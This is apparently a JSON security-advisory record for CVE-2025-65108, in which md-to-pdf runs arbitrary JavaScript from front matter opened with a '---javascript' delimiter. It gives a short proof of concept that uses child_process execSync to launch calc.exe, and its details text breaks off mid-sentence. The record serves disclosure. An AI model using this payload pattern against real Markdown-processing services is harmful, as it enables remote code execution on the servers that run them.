{"id":"GHSA-547r-qmjm-8hvw","summary":"md-to-pdf vulnerable to arbitrary JavaScript code execution when parsing front matter","details":"### Summary\nA Markdown front-matter block that opens with a JavaScript engine delimiter causes the JavaScript engine in the gray-matter library to execute arbitrary code in the Markdown-to-PDF converter process of the **md-to-pdf** library, resulting in remote code execution.\n\n### Details\n**md-to-pdf** uses the gray-matter library to parse front-matter. Gray-matter exposes a JavaScript engine that, when enabled or triggered by certain front-matter delimiters (e.g. `---js` or `---javascript`), will evaluate the front-matter contents as JavaScript. If user-supplied Markdown is fed to md-to-pdf and the front-matter contains malicious JS, the converter process will execute that code.\n\n### PoC\n```js\nconst { mdToPdf } = require('md-to-pdf');\n\n// Front matter opened with the JavaScript engine delimiter; gray-matter evaluates the block.\nvar payload = '---javascript\\n((require(\"child_process\")).execSync(\"calc.exe\"))\\n---RCE';\n\n(async () =\u003e {\n\tawait mdToPdf({ content: payload }, { dest: './output.pdf'});\n})();\n```\nRunning the PoC on Windows launches the calculator application, demonstrating arbitrary code execution.\n\n### Impact\n\n- Remote code execution in the process that performs Markdown-\u003ePDF conversion.\n- If the converter is run in a web app or cloud service, an attacker uploading malicious Markdown can execute arbitrary commands on the","aliases":["CVE-2025-65108"],"modified":"2025-11-25T19:48:40Z","published":"2025-11-20T17:48:11Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2025-11-20T17:48:11Z","cwe_ids":["CWE-94"],"severity":"CRITICAL","nvd_published_at":"2025-11-21T22:16:33Z"},"references":[{"type":"WEB","url":"https://github.com/simonhaenisch/md-to-pdf/security/advisories/GHSA-547r-qmjm-8hvw"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-65108"},{"type":"WEB","url":"https://github.com/simonhaenisch/md-to-pdf/commit/46bdcf2051c8d1758b391c1353185a179a47a4d9"},{"type":"PACKAGE","url":"https://github.com/simonhaenisch/md-to-pdf"}],"affected":[{"package":{"name":"md-to-pdf","ecosystem":"npm","purl":"pkg:npm/md-to-pdf"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"5.2.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/11/GHSA-547r-qmjm-8hvw/GHSA-547r-qmjm-8hvw.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}